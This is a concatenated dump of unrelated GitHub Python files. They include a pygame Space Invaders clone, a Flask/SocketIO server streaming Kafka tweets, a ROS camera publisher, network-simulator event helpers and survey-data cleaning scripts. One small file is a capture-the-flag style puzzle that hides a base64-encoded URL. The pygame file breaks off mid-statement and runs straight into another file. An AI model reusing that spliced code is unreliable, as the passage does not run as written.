geom.getbbox(ncs_polygon_r, offset=0.0)\n bboxes.append(_bbox)\n area_list.append(_bbox[0].area)\n # Rotate to position\n deg = area_list.index(min(area_list))\n rrad = math.radians(deg)\n bbox = bboxes[deg]\n _win_normal = [round(i, 1) for i in win_normals[deg].to_list()]\n del bbox[rm_pg.index(_win_normal) + 2]\n rotate_back = [pg.rotate(zaxis, rrad * -1) for pg in bbox]\n return rotate_back\n\n\ndef merge_windows(prims: Sequence[pr.Primitive]) -> pr.Primitive:\n \"\"\"Merge rectangles if coplanar.\"\"\"\n polygons = [geom.parse_polygon(p.fargs) for p in prims]\n normals = [p.normal for p in polygons]\n if len(set(normals)) > 1:\n raise ValueError(\"Windows not co-planar\")\n points = [i for p in polygons for i in p.vertices]\n hull_polygon = geom.convexhull(points, normals[0])\n modifier = prims[0].modifier\n identifier = prims[0].identifier\n new_prim = utils.polygon2prim(hull_polygon, modifier, identifier)\n return new_prim\n","repo_name":"LBNL-ETA/frads","sub_path":"frads/ncp.py","file_name":"ncp.py","file_ext":"py","file_size_in_byte":17697,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"33901732338","text":"import game\r\nimport board\r\n\r\nfrom threading import Thread\r\n\r\n# https://docs.python.org/3/library/threading.html\r\n# https://benedictwilkinsai.github.io/post/tkinter-mp/\r\n\r\nprint('test')\r\n\r\ngui_board = board.init_board(start=False)\r\ngame.board = board.Board(game.board)\r\ngame.board.attach_trigger(gui_board.set_board)\r\nthread = Thread(target=game.game)\r\nthread.start()\r\n\r\ngui_board.mainloop()\r\n ","repo_name":"milselarch/10-014","sub_path":"1D/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16442976082","text":"from flask import Flask, request,jsonify\nfrom flask_socketio import SocketIO,emit\nfrom flask_cors import CORS\nimport json\n\nfrom kafka import KafkaConsumer, KafkaProducer\nfrom dotenv import load_dotenv, find_dotenv\nimport os\nfrom pathlib import Path\n\n\n\n# ========================== setup ==========================\n\ndotenv_path = Path('../../.env')\nload_dotenv(dotenv_path=dotenv_path)\n\n# =========================== app ===========================\napp = Flask(__name__)\napp.config['SECRET_KEY'] = os.getenv('REACT_SECRET_KEY')\nCORS(app,resources={r\"/*\":{\"origins\":\"*\"}}) # not smart with all origins? \nsocketio = SocketIO(app,cors_allowed_origins=\"*\")\n\n# ========================== emits ===========================\n\n\n\n# ========================== events ==========================\n@app.route(\"/http-call\")\ndef http_call():\n \"\"\"return JSON with string data as the value\"\"\"\n data = {'data':'This is a big dummy'}\n return jsonify(data)\n\n@socketio.on(\"connect\")\ndef connected():\n print(\"client has connected\")\n \n emit(\"connect\",{\"data\":f\"id: {request.sid} is connected\"})\n # This is where we change id:\n \n\n@socketio.on('data')\ndef handle_message(data):\n # Data reciever message, here deal with query parameters\n print(\"data from the front end: \",str(data))\n print(data)\n # Send response:\n emit(\"data\",{'data':data,'id':request.sid},broadcast=True)\n\n@socketio.on('query')\ndef handle_message(data):\n # Data reciever message, here deal with query parameters\n print(\"data from the front end: \",str(data))\n print(data)\n # Send response:\n emit(\"query\",{'data':data,'id':request.sid},broadcast=True)\n\n@socketio.on(\"disconnect\")\ndef disconnected():\n \"\"\"event listener when client disconnects to the server\"\"\"\n print(\"user disconnected\")\n emit(\"disconnect\",f\"user {request.sid} disconnected\",broadcast=True)\n\n@socketio.on('givedata')\ndef handle_message(data):\n def stream_tweets():\n consumer = KafkaConsumer(bootstrap_servers='127.0.0.1:9092')\n consumer.subscribe(topics=['tweets_implicit'])\n try:\n # this method should auto-commit offsets as you consume them.\n # If it doesn't, turn on logging.DEBUG to see why it gets turned off.\n # Not assigning a group_id can be one cause\n for msg in consumer:\n # TODO: process the kafka messages.\n msg = json.loads(msg.value.decode())\n yield msg\n finally:\n # Always close your producers/consumers when you're done\n consumer.close()\n # data2 = {'data':[\n # {\n # 'text':'#somebody',\n # 'count':5,\n # 'color':'green',\n # },\n # {\n # 'text':'#once',\n # 'count':4,\n # 'color':'green',\n # },\n # {\n # 'text':'#told me',\n # 'count':3,\n # 'color':'none',\n # },\n # {\n # 'text':'#the world',\n # 'count':3,\n # 'color':'none',\n # },\n # {\n # 'text':'#was gonna change me',\n # 'count':3,\n # 'color':'none',\n # },\n # {\n # 'text':'#HillaryForJerusalem',\n # 'count':3,\n # 'color':'none',\n # },\n # ]}\n # emit(\"tweets\", data2, broadcast=True)\n for tweet in stream_tweets():\n emit('tweets', {'data':tweet})\n\n# @socketio.on(\"tweet_view_explicit_day\")\n# def tweet_view_explicit_day():\n# # send dayview for explicit tweets\n# data = {data:['123', '142', '421', '124']}\n# emit(\"tweet_view_explicit_day\", {'data':jsonify(data),'id':request.sid}, broadcast=True)\n\n# @socketio.on(\"tweet_view_impicit_day\")\n# def tweet_view_explicit_day():\n# # send dayview for explicit tweets\n# data = ['123', '142', '421', '124']\n# emit(\"tweet_view_implicit_day\", {'data':data,'id':request.sid}, broadcast=True)\nif __name__ == '__main__':\n socketio.run(app, debug=True,port=5001)","repo_name":"snorrealv/info319_semester_assignment","sub_path":"web/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21107043238","text":"import sys, random, math\nimport pygame\nimport pygame_gui\nimport pickle as P\n#Made Classes/Files\nimport PRPGD\nimport MainMenuGUI as MMGUI\nfrom interpolator import *\nimport VisualSprites as VS\nimport UtilityClasses as UC\n#import VisualSprites as VS\n\n#Constants\nGAMESTATE = 'MAIN_MENU'\nSCREENRECT = pygame.Rect(0,0,600,800)\nFIRE = 5\n#define our sprite groups and add them into super constructors to initiate\nall = pygame.sprite.RenderUpdates()\nshots = pygame.sprite.Group()\nenemies = pygame.sprite.Group()\nMenu = pygame.sprite.Group()\nenemyshots = pygame.sprite.Group()\nplayerG = pygame.sprite.Group()\nVsprites = pygame.sprite.Group()\nUsprites = pygame.sprite.Group()\n\npygame.init()\nclock = pygame.time.Clock()\n#custom user event with timer\nSpawnNow = pygame.event.Event(pygame.USEREVENT + 1)\npygame.time.set_timer(SpawnNow,3000,5)\n#Enemy Shot timer\nShoot = pygame.event.Event(pygame.USEREVENT + 2)\npygame.time.set_timer(Shoot, 500)\n#Get current MS\n#GUI Manager\nscreen = pygame.display.set_mode(SCREENRECT.size)\n\nmanager = pygame_gui.UIManager((SCREENRECT.size), 'MainTheme.json')\n#GUi element\nspawn_button = pygame_gui.elements.UIButton(relative_rect=pygame.Rect((0, 0), (100, 50)),text='Spawn Enemey',manager=manager)\n\n#Init classes\n\nclass Player(pygame.sprite.Sprite):\n #Base player class that handles movement and a method for getting the objects pos(gunpos)\n speed = 5\n images = ''\n health_capacity = 100\n current_health = health_capacity\n\n def __init__(self):\n super().__init__(all,playerG)\n self.rpgData = PRPGD.RPGData()\n self.rpgData.Health = self.health_capacity\n self.image = self.images\n self.rect = self.image.get_rect(midbottom=(300,780))\n self.reloading = 0\n self.HealthBar = pygame_gui.elements.ui_screen_space_health_bar.UIScreenSpaceHealthBar(relative_rect=pygame.Rect((10,780),(100,20)),\n manager=manager,sprite_to_monitor=Player)\n self.TotalScoreLabel = pygame_gui.elements.ui_label.UILabel(relative_rect=pygame.Rect((450,10),(150,20)),text=('Total Score: ' + str(self.rpgData.getTotalScore())),manager=manager)\n self.CoinLabel = pygame_gui.elements.ui_label.UILabel(relative_rect=pygame.Rect((450,30),(150,20)),text=('$$$: ' + str(self.rpgData.Coins)),manager=manager)\n\n def Move(self, direction):\n self.rect.x += (direction * self.speed)\n if self.rect.left < 0:\n self.rect.right=(600)\n elif self.rect.right > 600:\n self.rect.left=(0)\n\n\n def gunpos(self):\n pos = self.rect.midtop\n return pos\n\n def sethealth_capacity(self,new_hc, new_cc):\n self.health_capacity = new_hc\n\nclass Shot(pygame.sprite.Sprite):\n\n images = ''\n\n def __init__(self,pos):\n super().__init__(all,shots)\n self.image = self.images\n self.rect = self.image.get_rect(midbottom = pos)\n\n def update(self):\n self.rect.move_ip(0,-10)\n if self.rect.y <= 0:\n self.kill()\n\nclass EnemyShot(pygame.sprite.Sprite):\n\n images = ''\n\n def __init__(self,pos):\n super().__init__(all,enemyshots)\n self.image = self.images\n self.rect = self.image.get_rect(midbottom = pos)\n\n def update(self):\n self.rect.move_ip(0,10)\n if self.rect.y >= 800:\n self.kill()\n\n\nclass Enemy(pygame.sprite.Sprite):\n images = ''\n startdirection = 1\n damage = 10\n\n def __init__(self,hp):\n super().__init__(all,enemies)\n self.image = self.images\n self.rect = self.image.get_rect()\n self.rect.x = random.randint(100,500)\n self.rect.y = 100\n self.directionX = random.choice([-1,1])\n self.directionY = 0\n self.LastDirY = 0\n self.HP = hp\n self.Fire = 5\n self.Score = 5\n\n\n def gunpos(self):\n pos = self.rect.midbottom\n return pos\n\n def update(self):\n if self.rect.y < 100:\n self.directionY = 1\n self.rect.move_ip(0,1 * self.directionY)\n self.directionY = 0\n self.LastDirY = self.rect.y\n\n elif self.directionY > 0:\n if self.rect.y < (self.LastDirY + 24):\n self.rect.move_ip(0,1*self.directionY)\n elif self.rect.y == self.LastDirY + 24:\n self.directionY = 0\n\n elif self.directionX > 0:\n self.rect.move_ip(1*self.directionX,0)\n if self.rect.right > 600:\n self.directionX = -1\n self.directionY = 1\n self.LastDirY = self.rect.y\n\n elif self.directionX < 0:\n self.rect.move_ip(1 * self.directionX,0)\n if self.rect.left < 0:\n self.directionX = 1\n self.directionY = 1\n self.LastDirY = self.rect.y\n\n self.rect = self.rect.clamp(SCREENRECT)\n\n if len(playerG.sprites()) == 0:\n self.kill()\n if self.HP <= 1:\n self.image = pygame.image.load('Images\\EnemyImages\\\\ufo2.png')\n\nclass Spawner():\n def __init__(self, Amount):\n self.Amount = Amount\n self.SpawnEvent = pygame.event.Event(pygame.USEREVENT + 3)\n self.SpawnTimer = pygame.time.set_timer(self.SpawnEvent,5000,0)\n self.offsetCount = 0\n\n\n def SpawnBaseEnemy(self):\n self.offsetCount = 0\n for enemy in range(self.Amount):\n spawnE = Enemy(4)\n spawnE.rect.x = (((screen.get_width() - (self.Amount*32)) // 2) + (32*self.offsetCount))\n spawnE.rect.y = -10\n self.offsetCount += 1\n\n\nclass Background():\n def __init__(self):\n self.bgimage = pygame.image.load('Images\\\\BackgroundImages\\Space Background.png')\n self.rectBGimg = self.bgimage.get_rect()\n self.bgY1 = 0\n self.bgX1 = 0\n self.bgY2 = self.rectBGimg.height\n self.bgX2 = 0\n self.moving_speed = 1\n\n def update(self):\n self.bgY1 -= self.moving_speed\n self.bgY2 -= self.moving_speed\n if self.bgY1 <= -self.rectBGimg.height:\n self.bgY1 = self.rectBGimg.height\n if self.bgY2 <= -self.rectBGimg.height:\n self.bgY2 = self.rectBGimg.height\n\n\n def render(self):\n screen.blit(self.bgimage, (self.bgX1, self.bgY1))\n screen.blit(self.bgimage, (self.bgX2, self.bgY2))\n\n\ndef main():\n #setup main screen\n screen = pygame.display.set_mode(SCREENRECT.size)\n surface = pygame.Surface(screen.get_size())\n #initialize the screen extras\n pygame.display.set_caption('Space Invaders Test 2')\n pygame.display.set_icon(pygame.image.load('SpaceInvadersLogo.png'))\n\n #setup and display the background\n back_ground = Background()\n pygame.display.flip()\n\n #Load and prepare images\n Player.images = pygame.image.load('Images\\PlayerImages\\PlayerImg.png')\n Shot.images = pygame.image.load('Images\\ProjectileImages\\\\bullet.png')\n EnemyShot.images = pygame.image.load('Images\\ProjectileImages\\\\bomb.png')\n Enemy.images = pygame.image.load('Images\\EnemyImages\\\\ufo.png')\n\n\n menu = MMGUI.MAINMENU(manager,Menu)\n menu.PrePlayScreen()\n\n #create pre play screen and init starting sprites\n while menu.gamestate == 'Main Menu':\n time_delta = clock.tick(60)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n elif event.type == pygame.USEREVENT:\n if event.user_type == pygame_gui.UI_BUTTON_PRESSED:\n if event.ui_element == menu.PlayButton:\n menu.gamestate = 'Play'\n menu.KillPrePlayMenu()\n if event.ui_element == menu.Quit:\n return\n if event.ui_element == menu.LoadGame:\n menu.KillPrePlayMenu()\n menu.LoadScreen()\n if event.ui_element == menu.BackButton:\n if menu.LoadPanel != None:\n menu.KillLoadScreen()\n menu.PrePlayScreen()\n\n\n back_ground.update()\n back_ground.render()\n manager.process_events(event)\n manager.update(time_delta)\n manager.draw_ui(screen)\n pygame.display.update()\n\n StatMenuOpen = False\n paused = False\n player = Player()\n spawner = Spawner(3)\n\n #Main play while loop when paused\n while menu.gamestate == 'Play':\n time_delta = clock.tick(60)\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n return\n #User Events for retry menu\n if event.type == pygame.USEREVENT:\n if event.user_type == pygame_gui.UI_BUTTON_PRESSED:\n if event.ui_element == spawn_button:\n print('SpawnPressed')\n if event.ui_element == menu.PlayAgain:\n menu.MenuPanel.kill()\n Player.current_health = Player.health_capacity\n main()\n if event.ui_element == menu.Quit:\n return\n\n elif event.ui_element == menu.ResumeButton and hasattr(menu, 'ResumeButton'):\n paused = not paused\n menu.KillPauseScreen()\n #Stat Menu Button Events\n elif event.ui_element == player.rpgData.DamageButton and hasattr(player.rpgData, 'DamageButton'):\n if player.rpgData.StatPoints >= 1:\n player.rpgData.Damage += 1\n player.rpgData.StatPoints -= 1\n player.rpgData.DamageLabel.set_text('Damage Bonus: ' + str(player.rpgData.Damage))\n player.rpgData.StatPointsLabel.set_text('Stat Points: ' + str(player.rpgData.StatPoints))\n\n elif event.ui_element == player.rpgData.HealthButton and player.rpgData.StatPoints >= 1:\n player.rpgData.Health += 1\n player.health_capacity += 1\n player.current_health += 1\n player.HealthBar = pygame_gui.elements.ui_screen_space_health_bar.UIScreenSpaceHealthBar(relative_rect=pygame.Rect((10,780),(100,20)),\n manager=manager,sprite_to_monitor=player)\n player.rpgData.StatPoints -= 1\n player.rpgData.HealthLabel.set_text('Health Bonus: '+ str(player.rpgData.Health))\n player.rpgData.StatPointsLabel.set_text('Stat Points: ' + str(player.rpgData.StatPoints))\n\n elif event.ui_element == player.rpgData.LifeLeechButton and player.rpgData.StatPoints >= 1:\n player.rpgData.LifeLeech += 1\n player.rpgData.StatPoints -= 1\n player.rpgData.LifeLeechLabel.set_text('Life Leech Bonus: ' + str(player.rpgData.LifeLeech))\n player.rpgData.StatPointsLabel.set_text('Stat Points: ' + str(player.rpgData.StatPoints))\n\n elif player.rpgData.StatPoints <= 0:\n player.rpgData.DamageButton.disable()\n player.rpgData.HealthButton.disable()\n player.rpgData.LifeLeechButton.disable()\n\n #Global enemy fire event\n if event.type == pygame.USEREVENT + 2:\n #sprite_list = enemies.sprites()\n for enemy in enemies.sprites():\n enemy.Fire = random.randint(0,10)\n if enemy.Fire == FIRE:\n EnemyShot(enemy.gunpos())\n\n #Spawner Event\n if event.type == pygame.USEREVENT+3 and paused == False:\n spawner.SpawnBaseEnemy()\n\n #Pause and Stat Menu\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE and paused == True and StatMenuOpen == False:\n menu.KillPauseScreen()\n paused = not paused\n\n elif event.key == pygame.K_ESCAPE and paused == True and StatMenuOpen == True:\n player.rpgData.KillStatMenu()\n paused = False\n StatMenuOpen = False\n\n elif event.key == pygame.K_ESCAPE and paused == False and StatMenuOpen == True:\n player.rpgData.KillStatMenu()\n menu.PauseMenu()\n paused = not paused\n StatMenuOpen = False\n\n elif event.key == pygame.K_ESCAPE and paused == False and StatMenuOpen == False:\n menu.PauseMenu()\n paused = True\n\n\n\n if event.key == pygame.K_l and StatMenuOpen == False:\n if hasattr(menu,'PausePanel'):\n menu.KillPauseScreen()\n\n statMenu = player.rpgData.StatMenu(manager,player.rpgData)\n if player.rpgData.StatPoints <= 0:\n player.rpgData.DamageButton.disable()\n player.rpgData.HealthButton.disable()\n player.rpgData.LifeLeechButton.disable()\n StatMenuOpen = True\n paused = True\n\n elif event.key == pygame.K_l and StatMenuOpen == True:\n player.rpgData.KillStatMenu()\n StatMenuOpen = False\n paused = False\n\n manager.process_events(event)\n manager.draw_ui(screen)\n manager.update(time_delta)\n player.HealthBar.redraw()\n pygame.display.update()\n if paused == True:\n continue\n\n else:\n #Main while loop when not paused\n manager.process_events(event)\n manager.update(time_delta)\n\n all.clear(screen,surface)\n all.update()\n\n\n keystate = pygame.key.get_pressed()\n direction = keystate[pygame.K_RIGHT] - keystate[pygame.K_LEFT]\n player.Move(direction)\n fireing = keystate[pygame.K_SPACE]\n if not player.reloading and fireing:\n shot = Shot(player.gunpos())\n player.reloading = fireing\n #Collision detection\n\n #Enemy for player shots\n for enemy in pygame.sprite.groupcollide(enemies,shots,0,1).keys():\n hitNumber = UC.HitNumbers(enemy,player,True,all,Usprites)\n if enemy.HP > abs((enemy.HP - player.rpgData.getDamage())):\n #player.rpgData.XPDamage(player.rpgData.getDamage(),enemy.HP)\n enemy.HP -= player.rpgData.getDamage()\n #print('Level:',player.rpgData.getPlayerLevel(),'CurrentXP:',player.rpgData.getCurrentXP(),'XPNeeded:',player.rpgData.getXPNeeded())\n if enemy.HP <= 0:\n player.rpgData.TotalScore += enemy.Score\n player.rpgData.XPforScore(enemy.Score)\n #print('Level:',player.rpgData.getPlayerLevel(),'CurrentXP:',player.rpgData.getCurrentXP(),'XPNeeded:',player.rpgData.getXPNeeded())\n enemy.kill()\n #print(\"Total Score:\",player.rpgData.TotalScore)\n player.TotalScoreLabel.set_text(\"Total Score:\" + str(player.rpgData.TotalScore))\n coinS = VS.CoinSprite(enemy,all,Vsprites,player)\n explosion = VS.Explosion(all,Vsprites,enemy)\n HitNumber = UC.HitNumbers(enemy, player, False, all, Vsprites)\n\n else:\n player.rpgData.XPforScore(enemy.Score)\n player.rpgData.TotalScore += enemy.Score\n enemy.kill()\n player.TotalScoreLabel.set_text(\"Total Score:\" + str(player.rpgData.TotalScore))\n coinS = VS.CoinSprite(enemy,all,Vsprites,player)\n explosion = VS.Explosion(all,Vsprites,enemy)\n hitNumber = UC.HitNumbers(enemy, player, False, all, Usprites)\n\n if player.current_health < player.health_capacity:\n vampS = VS.VampSprite(enemy,all,Vsprites,player)\n \n #Player for enemy shots\n for player in pygame.sprite.groupcollide(playerG, enemyshots,0,1).keys():\n player.current_health -= Enemy.damage\n player.HealthBar = pygame_gui.elements.ui_screen_space_health_bar.UIScreenSpaceHealthBar(relative_rect=pygame.Rect((10,780),(100,20)),\n manager=manager,sprite_to_monitor=player)\n print(player.current_health)\n if player.current_health <= 0:\n player.kill()\n #menu.gamestate = 'Retry'\n menu.RetryScreen()\n\n #VisualSprites\n for sprite in pygame.sprite.groupcollide(Vsprites, playerG,1,0).keys():\n if type(sprite) == type(coinS):\n player.rpgData.Coins += 1\n player.CoinLabel.set_text('$$$:' + str(player.rpgData.Coins))\n print('Coin')\n elif type(sprite) == type(vampS):\n if player.current_health result:\n result = counter\nprint(result)\n\n\n# 4\n# - . - . - -\n# . - . . - .\n# . - - - - -\n# - - - . - -","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Dots.py","file_name":"Dots.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"11015702022","text":"# -*- coding: utf-8 -*- \n'''\n 可视化颜色阈值调参软件\n'''\n\nimport cv2\nimport numpy as np\nimport sys\nimport rospy\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\n\n\ndef detectCircle():\n\n pub_Img = rospy.Publisher('circle/image', Image, queue_size=1) \n rospy.init_node('detectCircle', anonymous=True)\n rate = rospy.Rate(30)\n bridge = CvBridge()\n # 读入视频流\n cap = cv2.VideoCapture(0)\n \n while(True):\n # 逐帧获取画面\n # ret ? 画面是否获取成功\n ret, frame = cap.read()\n \n if ret:\n img = frame\n # img2 = cv2.resize(img,(160,120))\n pub_Img.publish(bridge.cv2_to_imgmsg(img, '8UC3'))\n # cv2.imshow('img',img)\n #cv2.imshow('canny',canny_img)\n\n else:\n print(\"视频读取完毕或者视频路径异常\")\n break\n\n # 这里做一下适当的延迟,每帧延时0.1s钟\n if cv2.waitKey(30) & 0xFF == ord('q'):\n break\n\n # 释放资源\n cap.release()\n #cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n detectCircle()\n","repo_name":"dawnchen123/autoFlight","sub_path":"src/autoControl/pubCam.py","file_name":"pubCam.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74894528487","text":"import sys\nimport types\n\nimport evtimer\nimport utils.framers.ieee80211.evframes80211 as evframes80211\nimport evrequest\n#sys.path = sys.path + ['..']\n\n\n\ndef mkevent(nickname, **kwargs):\n '''Returns an event of the given event nickname.\n\n @param nickname: a valid event nickname, i.e. one that is a key in dictionary of valid nicknames.\n @param kwargs: a dictionary of variables depending on the type of event. Field C{ev_dc} is a dictionary of fields and values for the corresponding event type; field C{frmpkt} is a binary packed frame.\n @return: an Event object.\n '''\n\n from evtimer import dc_nicknames as ev_dc_nicknames\n import utils.framers.ieee80211.evframes80211\n import evrequest\n\n frmpkt, ev_dc = '', {}\n if kwargs.has_key('ev_dc'):\n ev_dc = kwargs['ev_dc']\n if kwargs.has_key('frmpkt'):\n frmpkt = kwargs['frmpkt']\n ev_dc['frame_length'] = len(frmpkt)\n else:\n ev_dc['frame_length'] = 0\n frmpkt = ''\n if kwargs.has_key('payload'):\n payload = kwargs['payload']\n else:\n payload = ''\n if evtimer.dc_nicknames.has_key(nickname):\n ptype, psubtype, eventclass = evtimer.dc_nicknames[nickname]\n return eventclass(nickname, ptype, psubtype, ev_dc) \n elif evframes80211.dc_nicknames.has_key(nickname):\n ev_type, ev_subtype, eventclass = evframes80211.dc_nicknames[nickname]\n ev = eventclass(nickname, ev_type, ev_subtype, frmpkt, ev_dc)\n ev.payload = payload\n return ev\n elif evrequest.dc_nicknames.has_key(nickname):\n ptype, psubtype, eventclass = evrequest.dc_nicknames[nickname]\n return eventclass(nickname, ptype, psubtype, ev_dc) \n else:\n raise EventNameException(nickname + ' is not a valid nickname.')\n\n\n\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n\n\n","repo_name":"git-artes/GNUWiNetwork","sub_path":"gwn/gwnevents/api_events.py","file_name":"api_events.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26904891803","text":"__contact__ = \"thedominusweb@gmail.com\"\r\n\r\nimport socket\r\nimport os\r\nfrom threading import Thread\r\nfrom Tkinter import *\r\nfrom PIL import ImageTk, Image\r\n\r\nmsg = \"dGhlZG9taW51c3dlYi5vbmxpbmUvdW5kZXJncm91bmQvc2V2aXllMi9zZXZpeWUzZXJpc2ltLnBocA==\"\r\nbase64_bytes = msg.encode('ascii')\r\nmsg_bytes = base64.b64decode(base64_bytes)\r\ndecoded_msg = msg_bytes.decode('ascii')\r\n\r\ndef command_clear():\r\n if os.name==\"nt\":\r\n os.system('cls')\r\n elif os.name==\"posix\":\r\n os.system('clear')\r\n\r\ndef printit():\r\n pencere.destroy()\r\n pencere2 = Tk()\r\n pencere2.title('Seviye3')\r\n pencere2.configure(background='black')\r\n pencere2.geometry('750x600')\r\n w = Label(pencere2, text=msg)\r\n w.pack()\r\n ws = Label(pencere2, text=\"Capture the Flag\")\r\n ws.pack()\r\n \r\n\r\npencere = Tk()\r\npencere.title('Seviye3')\r\npencere.configure(background='black')\r\npencere.geometry('750x600')\r\nimg = ImageTk.PhotoImage(Image.open(\"generatedtext.png\"))\r\nimg_label = Label(pencere, image=img)\r\nimg_label.pack()\r\nB = Button(pencere, text =\"Click Me\", command = printit)\r\nB.pack()\r\npencere.mainloop()\r\n\r\ncommand_clear()\r\n","repo_name":"thedominusweb/seviye3erisim","sub_path":"seviye3.py","file_name":"seviye3.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27037048705","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import Select\nfrom urllib.request import urlopen\nimport json\nimport time\n\nclass tests:\n def __init__(self,gnt_url,getad_url):\n #global driver\n self.gnt_url=gnt_url\n self.getad_url=getad_url\n\n\n\n # def create_new_camp_from_gui(self):\n # driver.get(self.gui_url)\n # driver.maximize_window()\n # driver.find_element_by_id(\"textfield1\").send_keys(self.gui_user_name)\n # driver.find_element_by_id(\"textfield4\").send_keys(self.password)\n # driver.find_element_by_id(\"target\").click()\n # driver.find_element_by_id(\"btnNewCampaign\").click()\n # select =Select(driver.find_element_by_css_selector(\"[ng-model^=PlatformType]\"))\n # select.select_by_value('Desktop')\n # driver.find_element_by_xpath(\"//*[contains(text(), 'Bidding')]\").click()\n # driver.find_element_by_xpath(\"//*[contains(text(), 'Choose Product')]\").click()\n # driver.find_element_by_xpath(\"//*[contains(text(), 'eRoll')]\").click()\n\n def check_get_ad(self):\n get_ad_works=False\n for i in range (0,35):\n time.sleep(5)\n response = urlopen(self.getad_url)\n string = response.read().decode('utf-8')\n if \"Ad id=\" not in string:\n print (\"Get-Ad is not have Campaign inside- trying again \")\n continue\n else:\n get_ad_works=True\n print (\"Get-Ad works!\")\n break\n return get_ad_works\n\n\n def check_gnt(self):\n gnt_works=False\n for i in range (0,35):\n time.sleep(5)\n response = urlopen(self.gnt_url)\n string = response.read().decode('utf-8')\n if \"Sucsess\" not in string:\n print (\"GNT is not have Campaign inside- trying again \")\n continue\n else:\n gnt_works=True\n print (\"GNT works!\")\n break\n return gnt_works\n\n\n\n\n# liron=tests('http://staging3.advsnx.net/index.html','http://staging3.advsnx.net/asa/admin/login.aspx','bobo123','Admin1','tmf','C:\\\\chromedriver.exe')\n# liron.check_get_ad()\n# liron.check_gnt()\n# liron.create_new_camp_from_gui()\n\n\n\n\n","repo_name":"LironBenEzra/versionAutomation","sub_path":"Progect/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3594094182","text":"\"\"\"Functions for applying complete case missingness correction to\nUnderstanding Society data.\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\nimport US_utils\n\ndef complete_case(data):\n \"\"\" main function for complete case.\n Parameters\n ----------\n data : pd.DataFrame\n US data to perform complete case correction on.\n Returns\n -------\n data : pd.DataFrame\n Corrected data.\n \"\"\"\n data = data.replace(US_utils.missing_types, np.nan)\n data = data.dropna(axis=0)\n return data\n\n\ndef complete_case_varlist(data, varlist):\n \"\"\" Function for complete case only on specific vars (from varlist).\n Parameters\n ----------\n data : pd.DataFrame\n US data to perform complete case correction on.\n varlist : list\n List of variables for which to perform complete case on\n Returns\n -------\n data : pd.DataFrame\n Corrected data.\n \"\"\"\n for var in varlist:\n data[var] = data[var].replace(US_utils.missing_types, np.nan)\n data = data.dropna(axis=0, subset=[var])\n\n #data[varlist] = data[varlist].replace(US_utils.missing_types, np.nan)\n\n #data = data.dropna(axis=0)\n data = data.reset_index(drop=True)\n return data\n\n\ndef complete_case_custom_years(data, var, years):\n\n # Replace all missing values in years (below 0) with NA, and drop the NAs\n data[var][data['time'].isin(years)] = data[var][data['time'].isin(years)].replace(US_utils.missing_types, np.nan)\n data = data[~(data['time'].isin(years) & data[var].isna())]\n\n return data\n\n\nif __name__ == \"__main__\":\n\n years = np.arange(2009, 2020)\n file_names = [f\"data/composite_US/{item}_US_cohort.csv\" for item in years]\n data = US_utils.load_multiple_data(file_names)\n\n complete_case_vars = [\"housing_quality\", 'marital_status', 'yearly_energy', \"job_sec\",\n \"education_state\", 'region', \"age\"] # many of these\n # REMOVED: 'job_sector', 'labour_state'\n\n data = complete_case_varlist(data, complete_case_vars)\n\n ## Need to do correction on some variables individually as they are only in the dataset in specific years\n # doing complete case without the year range taken into account removes the whole years data\n # make sure its int not float (need to convert NA to 0 for this to work)\n data = complete_case_custom_years(data, 'loneliness', years=[2017, 2018, 2019, 2020])\n #data['loneliness'] = pd.to_numeric(data['loneliness'], errors='coerce').fillna(1).astype('int')\n ## Now do same for neighbourhood_safety\n data = complete_case_custom_years(data, 'neighbourhood_safety', years=[2011, 2014, 2017])\n #data['neighbourhood_safety'] = pd.to_numeric(data['neighbourhood_safety'], errors='coerce').fillna(2).astype('int')\n # ncigs missing for wave 1 only\n data = complete_case_custom_years(data, 'ncigs', years=list(range(2013, 2020, 1)))\n #data['ncigs'] = pd.to_numeric(data['ncigs'], errors='coerce').fillna(0).astype('int')\n # Nutrition only present in 2014\n data = complete_case_custom_years(data, 'nutrition_quality', years=[2015, 2017, 2019])\n #data['nutrition_quality'] = pd.to_numeric(data['nutrition_quality'], errors='coerce').fillna((data['nutrition_quality']).mean()).astype('int')\n\n ########## TESTING ##########\n #data = data[~(data['time'].isin([2011, 2014, 2017]) & data['neighbourhood_safety'].isna())]\n ########## TESTING ##########\n\n\n drop_columns = ['financial_situation', # these are just SF12 MICE columns for now. see US_format_raw.py\n 'ghq_depression',\n 'scsf1',\n 'clinical_depression',\n 'ghq_happiness',\n 'phealth_limits_work',\n 'likely_move',\n 'newest_education_state',\n 'health_limits_social',\n 'future_financial_situation',\n 'behind_on_bills',\n 'mhealth_limits_work'] # some columns are used in analyses elsewhere such as MICE and not featured in the final model.\n # remove them here or as late as needed.\n data = data.drop(labels=drop_columns, axis=1)\n\n\n\n US_utils.save_multiple_files(data, years, \"data/complete_US/\", 